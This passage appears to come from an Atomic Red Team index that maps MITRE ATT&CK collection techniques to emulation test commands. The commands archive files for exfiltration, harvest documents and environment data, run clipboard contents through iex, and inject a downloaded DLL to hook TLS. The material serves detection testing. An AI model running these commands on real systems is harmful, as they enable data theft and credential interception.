01df0353-d531-408d-a0c5-3161bf822134 - description: | - Note: Requires winzip installation - wzzip sample.zip -s"blueblue" *.txt (VARIANT) - supported_platforms: - - windows - input_arguments: - winzip_exe: - description: Path to installed Winzip executable - type: Path - default: "%ProgramFiles%\\WinZip\\winzip64.exe" - winzip_url: - description: Path to download Windows Credential Editor zip file - type: url - default: https://download.winzip.com/gl/nkln/winzip24-home.exe - winzip_hash: - description: File hash of the Windows Credential Editor zip file - type: String - default: B59DB592B924E963C21DA8709417AC0504F6158CFCB12FE5536F4A0E0D57D7FB - dependency_executor_name: powershell - dependencies: - - description: 'Winzip must be installed - -' - prereq_command: 'cmd /c ''if not exist "#{winzip_exe}" (echo 1) else (echo - 0)'' - -' - get_prereq_command: | - if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){ - Write-Host Follow the installation prompts to continue - cmd /c "$env:Temp\winzip.exe" - } - executor: - name: command_prompt - elevation_required: false - command: | - path=%path%;"C:\Program Files (x86)\winzip" - mkdir .\tmp\victim-files - cd .\tmp\victim-files - echo "This file will be encrypted" > .\encrypted_file.txt - "#{winzip_exe}" -min -a -s"hello" archive.zip * - dir - - name: Compress Data and lock with password for Exfiltration with 7zip - auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198 - description: 'Note: Requires 7zip installation - -' - supported_platforms: - - windows - executor: - name: command_prompt - elevation_required: false - command: | - mkdir $PathToAtomicsFolder\T1560.001\victim-files - cd $PathToAtomicsFolder\T1560.001\victim-files - echo "This file will be encrypted" > .\encrypted_file.txt - 7z a archive.7z -pblue - dir - - name: Data Compressed - nix - zip - auto_generated_guid: c51cec55-28dd-4ad2-9461-1eacbc82c3a0 - description: 'An adversary may compress data (e.g., sensitive documents) that - is collected prior to exfiltration. This test uses standard zip compression. - -' - supported_platforms: - - linux - - macos - input_arguments: - input_files: - description: Path that should be compressed into our output file, may include - wildcards - type: Path - default: "$HOME/*.txt" - output_file: - description: Path that should be output as a zip archive - type: Path - default: "$HOME/data.zip" - dependencies: - - description: 'Files to zip must exist (#{input_files}) - -' - prereq_command: 'if [ $(ls #{input_files} | wc -l) > 0 ]; then exit 0; else - exit 1; fi; - -' - get_prereq_command: 'echo Please set input_files argument to include files - that exist - -' - executor: - name: sh - elevation_required: false - command: 'zip #{output_file} #{input_files} - -' - cleanup_command: 'rm -f #{output_file} - -' - - name: Data Compressed - nix - gzip Single File - auto_generated_guid: cde3c2af-3485-49eb-9c1f-0ed60e9cc0af - description: 'An adversary may compress data (e.g., sensitive documents) that - is collected prior to exfiltration. This test uses standard gzip compression. - -' - supported_platforms: - - linux - - macos - input_arguments: - input_file: - description: Path that should be compressed - type: Path - default: "$HOME/victim-gzip.txt" - input_content: - description: contents of compressed files if file does not already exist. - default contains test credit card and social security number - type: String - default: 'confidential! SSN: 078-05-1120 - CCN: 4000 1234 5678 9101' - executor: - name: sh - elevation_required: false - command: 'test -e #{input_file} && gzip -k #{input_file} || (echo ''#{input_content}'' - >> #{input_file}; gzip -k #{input_file}) - -' - cleanup_command: 'rm -f #{input_file}.gz - -' - - name: Data Compressed - nix - tar Folder or File - auto_generated_guid: 7af2b51e-ad1c-498c-aca8-d3290c19535a - description: 'An adversary may compress data (e.g., sensitive documents) that - is collected prior to exfiltration. This test uses standard gzip compression. - -' - supported_platforms: - - linux - - macos - input_arguments: - input_file_folder: - description: Path that should be compressed - type: Path - default: "$HOME/$USERNAME" - output_file: - description: File that should be output - type: Path - default: "$HOME/data.tar.gz" - dependencies: - - description: 'Folder to zip must exist (#{input_file_folder}) - -' - prereq_command: 'test -e #{input_file_folder} - -' - get_prereq_command: 'echo Please set input_file_folder argument to a folder - that exists - -' - executor: - name: sh - elevation_required: false - command: 'tar -cvzf #{output_file} #{input_file_folder} - -' - cleanup_command: 'rm -f #{output_file} - -' - - name: Data Encrypted with zip and gpg symmetric - auto_generated_guid: '0286eb44-e7ce-41a0-b109-3da516e05a5f' - description: 'Encrypt data for exiltration - -' - supported_platforms: - - macos - - linux - input_arguments: - test_folder: - description: Path used to store files. - type: Path - default: "/tmp/T1560" - test_file: - description: Temp file used to store encrypted data. - type: Path - default: T1560 - encryption_password: - description: Password used to encrypt data. - type: string - default: InsertPasswordHere - dependency_executor_name: sh - dependencies: - - description: gpg and zip are required to run the test. - prereq_command: 'if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" - ]; then exit 1; fi; - -' - get_prereq_command: 'echo "Install gpg and zip to run the test"; exit 1; - -' - executor: - name: sh - elevation_required: false - command: | - mkdir -p #{test_folder} - cd #{test_folder}; touch a b c d e f g - zip --password "#{encryption_password}" #{test_folder}/#{test_file} ./* - echo "#{encryption_password}" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/#{test_file}.zip.gpg -c #{test_folder}/#{test_file}.zip - ls -l #{test_folder} - cleanup_command: 'rm -Rf #{test_folder}' - T1123: - technique: - id: attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Audio Capture - description: |- - An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information. - - Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later. - external_references: - - source_name: mitre-attack - url: https://attack.mitre.org/techniques/T1123 - external_id: T1123 - - external_id: CAPEC-634 - source_name: capec - url: https://capec.mitre.org/data/definitions/634.html - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-07-14T19:42:10.235Z' - created: '2017-05-31T21:31:34.528Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_permissions_required: - - User - x_mitre_detection: |- - Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system. - - Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data. - x_mitre_data_sources: - - API monitoring - - Process monitoring - - File monitoring - x_mitre_version: '1.0' - identifier: T1123 - atomic_tests: - - name: using device audio capture commandlet - auto_generated_guid: 9c3ad250-b185-4444-b5a9-d69218a10c95 - description: "[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)\n" - supported_platforms: - - windows - executor: - command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet - -' - name: powershell - T1119: - technique: - created: '2017-05-31T21:31:27.985Z' - modified: '2020-03-31T22:18:43.019Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - type: attack-pattern - id: attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Automated Collection - description: "Once established within a system or network, an adversary may - use automated techniques for collecting internal data. Methods for performing - this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) - to search for and copy information fitting set criteria such as file type, - location, or name at specific time intervals. This functionality could also - be built into remote access tools. \n\nThis technique may incorporate use - of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) - and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to - identify and move files." - external_references: - - source_name: mitre-attack - url: https://attack.mitre.org/techniques/T1119 - external_id: T1119 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - x_mitre_system_requirements: - - Permissions to access directories and files that store information of interest. - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_permissions_required: - - User - x_mitre_detection: Depending on the method used, actions could include common - file system commands and parameters on the command-line interface within batch - files or scripts. A sequence of actions like this may be unusual, depending - on the system and network environment. Automated collection may occur along - with other techniques such as [Data Staged](https://attack.mitre.org/techniques/T1074). - As such, file access monitoring that shows an unusual process performing sequential - file opens and potentially copy actions to another location on the file system - for many files at once may indicate automated collection behavior. Remote - access tools with built-in features may interact directly with the Windows - API to gather data. Data may also be acquired through Windows system management - tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) - and [PowerShell](https://attack.mitre.org/techniques/T1059/001). - x_mitre_data_sources: - - File monitoring - - Data loss prevention - - Process command-line parameters - x_mitre_version: '1.0' - x_mitre_is_subtechnique: false - identifier: T1119 - atomic_tests: - - name: Automated Collection Command Prompt - auto_generated_guid: cb379146-53f1-43e0-b884-7ce2c635ff5b - description: | - Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_command_prompt_collection - to see what was collected. - supported_platforms: - - windows - executor: - command: | - mkdir %temp%\T1119_command_prompt_collection >nul 2>&1 - dir c: /b /s .docx | findstr /e .docx - for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection - cleanup_command: 'del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1 - -' - name: command_prompt - - name: Automated Collection PowerShell - auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313 - description: | - Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_powershell_collection - to see what was collected. - supported_platforms: - - windows - executor: - command: | - New-Item -Path $env:TEMP\T1119_powershell_collection -ItemType Directory -Force | Out-Null - Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination $env:TEMP\T1119_powershell_collection} - cleanup_command: 'Remove-Item $env:TEMP\T1119_powershell_collection -Force - -ErrorAction Ignore | Out-Null - -' - name: powershell - - name: Recon information for export with PowerShell - auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26 - description: | - collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt - to see what was collected. - supported_platforms: - - windows - executor: - command: | - Get-Service > $env:TEMP\T1119_1.txt - Get-ChildItem Env: > $env:TEMP\T1119_2.txt - Get-Process > $env:TEMP\T1119_3.txt - cleanup_command: | - Remove-Item $env:TEMP\T1119_1.txt -ErrorAction Ignore - Remove-Item $env:TEMP\T1119_2.txt -ErrorAction Ignore - Remove-Item $env:TEMP\T1119_3.txt -ErrorAction Ignore - name: powershell - - name: Recon information for export with Command Prompt - auto_generated_guid: aa1180e2-f329-4e1e-8625-2472ec0bfaf3 - description: | - collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt - to see what was collected. - supported_platforms: - - windows - executor: - command: | - sc query type=service > %TEMP%\T1119_1.txt - doskey /history > %TEMP%\T1119_2.txt - wmic process list > %TEMP%\T1119_3.txt - tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt - cleanup_command: | - del %TEMP%\T1119_1.txt >nul 2>&1 - del %TEMP%\T1119_2.txt >nul 2>&1 - del %TEMP%\T1119_3.txt >nul 2>&1 - del %TEMP%\T1119_4.txt >nul 2>&1 - name: command_prompt - T1115: - technique: - id: attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Clipboard Data - description: "Adversaries may collect data stored in the clipboard from users - copying information within or between applications. \n\nIn Windows, Applications - can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) - OSX provides a native command, pbpaste, to grab clipboard contents.(Citation: - Operating with EmPyre)" - external_references: - - source_name: mitre-attack - external_id: T1115 - url: https://attack.mitre.org/techniques/T1115 - - external_id: CAPEC-637 - source_name: capec - url: https://capec.mitre.org/data/definitions/637.html - - url: https://msdn.microsoft.com/en-us/library/ms649012 - description: Microsoft. (n.d.). About the Clipboard. Retrieved March 29, 2016. - source_name: MSDN Clipboard - - url: https://medium.com/rvrsh3ll/operating-with-empyre-ea764eda3363 - description: rvrsh3ll. (2016, May 18). Operating with EmPyre. Retrieved July - 12, 2017. - source_name: Operating with EmPyre - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-04-23T18:35:58.230Z' - created: '2017-05-31T21:31:25.967Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Linux - - Windows - - macOS - x_mitre_detection: Access to the clipboard is a legitimate function of many - applications on an operating system. If an organization chooses to monitor - for this behavior, then the data will likely need to be correlated against - other suspicious or non-user-driven activity. - x_mitre_data_sources: - - API monitoring - x_mitre_version: '1.1' - identifier: T1115 - atomic_tests: - - name: Utilize Clipboard to store or execute commands from - auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7 - description: 'Add data to clipboard to copy off or execute commands from. - -' - supported_platforms: - - windows - executor: - command: | - dir | clip - echo "T1115" > %temp%\T1115.txt - clip < %temp%\T1115.txt - cleanup_command: 'del %temp%\T1115.txt >nul 2>&1 - -' - name: command_prompt - - name: Execute Commands from Clipboard using PowerShell - auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416 - description: 'Utilize PowerShell to echo a command to clipboard and execute - it - -' - supported_platforms: - - windows - executor: - command: | - echo Get-Process | clip - Get-Clipboard | iex - name: powershell - - name: Execute commands from clipboard - auto_generated_guid: 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff - description: Echo a command to clipboard and execute it - supported_platforms: - - macos - executor: - command: |- - echo ifconfig | pbcopy - $(pbpaste) - name: bash - T1213.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1213.001 - url: https://attack.mitre.org/techniques/T1213/001 - - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html - description: Atlassian. (2018, January 9). How to Enable User Access Logging. - Retrieved April 4, 2018. - source_name: Atlassian Confluence Logging - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Confluence - description: |2 - - Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as: - - * Policies, procedures, and standards - * Physical / logical network diagrams - * System architecture diagrams - * Technical system documentation - * Testing / development credentials - * Work / project schedules - * Source code snippets - * Links to network shares and other internal resources - id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-03-24T16:42:09.222Z' - created: '2020-02-14T13:09:51.004Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - x_mitre_detection: |- - Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. - - User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities. - x_mitre_data_sources: - - Third-party application logs - - Authentication logs - x_mitre_platforms: - - SaaS - atomic_tests: [] - T1056.004: - technique: - external_references: - - source_name: mitre-attack - external_id: T1056.004 - url: https://attack.mitre.org/techniques/T1056/004 - - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017 - description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I. - Retrieved December 18, 2017. - url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918 - - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx - description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017. - source_name: Microsoft Hook Overview - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/ - description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks. - Retrieved December 12, 2017.' - source_name: Adlice Software IAT Hooks Oct 2014 - - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/ - description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User - Mode. Retrieved December 20, 2017.' - source_name: MWRInfoSecurity Dynamic Hooking 2015 - - url: https://www.exploit-db.com/docs/17802.pdf - description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved - December 12, 2017. - source_name: HighTech Bridge Inline Hooking Sept 2011 - - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html - description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware - Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017. - source_name: Volatility Detecting Hooks Sept 2012 - - url: https://github.com/prekageo/winhook - description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017. - source_name: PreKageo Winhook Jul 2011 - - url: https://github.com/jay/gethooks - description: Satiro, J. (2011, September 14). GetHooks. Retrieved December - 12, 2017. - source_name: Jay GetHooks Sept 2011 - - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/ - description: Felici, M. (2006, December 6). Any application-defined hook procedure - on my machine?. Retrieved December 12, 2017. - source_name: Zairon Hooking Dec 2006 - - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/ - description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense - against user-land. Retrieved December 12, 2017.' - source_name: EyeofRa Detecting Hooking June 2017 - - url: http://www.gmer.net/ - description: GMER. (n.d.). GMER. Retrieved December 12, 2017. - source_name: GMER Rootkits - - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx - description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved - December 12, 2017. - source_name: Microsoft Process Snapshot - - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis - description: Stack Exchange - Security. (2012, July 31). What are the methods - to find hooked functions and APIs?. Retrieved December 12, 2017. - source_name: StackExchange Hooks Jul 2012 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Credential API Hooking - description: | - Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via: - - * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Endgame Process Injection July 2017) - * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Endgame Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015) - * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Endgame Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015) - id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - - kill_chain_name: mitre-attack - phase_name: credential-access - modified: '2020-03-24T21:29:13.565Z' - created: '2020-02-11T19:01:15.930Z' - x_mitre_data_sources: - - Windows event logs - - Process monitoring - - Loaded DLLs - - DLL monitoring - - Binary file metadata - - API monitoring - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_detection: |- - Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017) - - Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity. - - Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014) - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Windows - identifier: T1056.004 - atomic_tests: - - name: Hook PowerShell TLS Encrypt/Decrypt Messages - auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 - description: 'Hooks functions in PowerShell to read TLS Communications - -' - supported_platforms: - - windows - input_arguments: - file_name: - description: Dll To Inject - type: Path - default: PathToAtomicsFolder\T1056.004\bin\T1056.004x64.dll - server_name: - description: TLS Server To Test Get Request - type: Url - default: https://www.example.com - dependency_executor_name: powershell - dependencies: - - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name}) - -' - prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" - executor: - command: | - mavinject $pid /INJECTRUNNING #{file_name} - curl #{server_name} - name: powershell - elevation_required: true - T1074: - technique: - id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Data Staged - description: |- - Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017) - - In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020) - - Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection. - external_references: - - source_name: mitre-attack - external_id: T1074 - url: https://attack.mitre.org/techniques/T1074 - - source_name: PWC Cloud Hopper April 2017 - description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved - April 5, 2017. - url: https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf - - source_name: Mandiant M-Trends 2020 - url: https://content.fireeye.com/m-trends/rpt-m-trends-2020 - description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved - April 24, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-06-24T18:59:16.039Z' - created: '2017-05-31T21:30:58.938Z' - x_mitre_is_subtechnique: false - x_mitre_contributors: - - Praetorian - - Shane Tully, @securitygypsy - x_mitre_platforms: - - Linux - - macOS - - Windows - - AWS - - GCP - - Azure - x_mitre_detection: |- - Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging. - - Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_version: '1.2' - atomic_tests: [] - T1530: - technique: - id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7 - description: |- - Adversaries may access data objects from improperly secured cloud storage. - - Many cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) - - Misconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls. - name: Data from Cloud Storage Object - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - external_id: T1530 - source_name: mitre-attack - url: https://attack.mitre.org/techniques/T1530 - - source_name: Amazon S3 Security, 2019 - url: https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/ - description: Amazon. (2019, May 17). How can I secure the files in my Amazon - S3 bucket?. Retrieved October 4, 2019. - - source_name: Microsoft Azure Storage Security, 2019 - url: https://docs.microsoft.com/en-us/azure/storage/common/storage-security-guide - description: Amlekar, M., Brooks, C., Claman, L., et. al.. (2019, March 20). - Azure Storage security guide. Retrieved October 4, 2019. - - source_name: Google Cloud Storage Best Practices, 2019 - url: https://cloud.google.com/storage/docs/best-practices - description: Google. (2019, September 16). Best practices for Cloud Storage. - Retrieved October 4, 2019. - - source_name: Trend Micro S3 Exposed PII, 2017 - url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia - description: Trend Micro. (2017, November 6). A Misconfigured Amazon S3 Exposed - Almost 50 Thousand PII in Australia. Retrieved October 4, 2019. - - source_name: Wired Magecart S3 Buckets, 2019 - url: https://www.wired.com/story/magecart-amazon-cloud-hacks/ - description: 'Barrett, B.. (2019, July 11). Hack Brief: A Card-Skimming Hacker - Group Hit 17K Domains—and Counting. Retrieved October 4, 2019.' - - source_name: HIPAA Journal S3 Breach, 2017 - url: https://www.hipaajournal.com/47gb-medical-records-unsecured-amazon-s3-bucket/ - description: HIPAA Journal. (2017, October 11). 47GB of Medical Records and - Test Results Found in Unsecured Amazon S3 Bucket. Retrieved October 4, 2019. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-07-09T14:02:05.276Z' - created: '2019-08-30T18:07:27.741Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - AWS - - GCP - - Azure - x_mitre_version: '1.0' - x_mitre_contributors: - - Netskope - - Praetorian - x_mitre_detection: Monitor for unusual queries to the cloud provider's storage - service. Activity originating from unexpected sources may indicate improper - permissions are set that is allowing access to data. Additionally, detecting - failed attempts by a user for a certain object, followed by escalation of - privileges by the same user, and access to the same object may be an indication - of suspicious activity. - x_mitre_data_sources: - - Stackdriver logs - - Azure activity logs - - AWS CloudTrail logs - x_mitre_permissions_required: - - User - atomic_tests: [] - T1213: - technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1213 - url: https://attack.mitre.org/techniques/T1213 - - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2 - description: Microsoft. (2017, July 19). Configure audit settings for a site - collection. Retrieved April 4, 2018. - source_name: Microsoft SharePoint Logging - - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html - description: Atlassian. (2018, January 9). How to Enable User Access Logging. - Retrieved April 4, 2018. - source_name: Atlassian Confluence Logging - description: |- - Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. - - Adversaries may also collect information from shared storage repositories hosted on cloud infrastructure or in software-as-a-service (SaaS) applications, as storage is one of the more fundamental requirements for cloud services and systems. - - The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository: - - * Policies, procedures, and standards - * Physical / logical network diagrams - * System architecture diagrams - * Technical system documentation - * Testing / development credentials - * Work / project schedules - * Source code snippets - * Links to network shares and other internal resources - - Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include [Sharepoint](https://attack.mitre.org/techniques/T1213/002), [Confluence](https://attack.mitre.org/techniques/T1213/001), and enterprise databases such as SQL Server. - name: Data from Information Repositories - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: 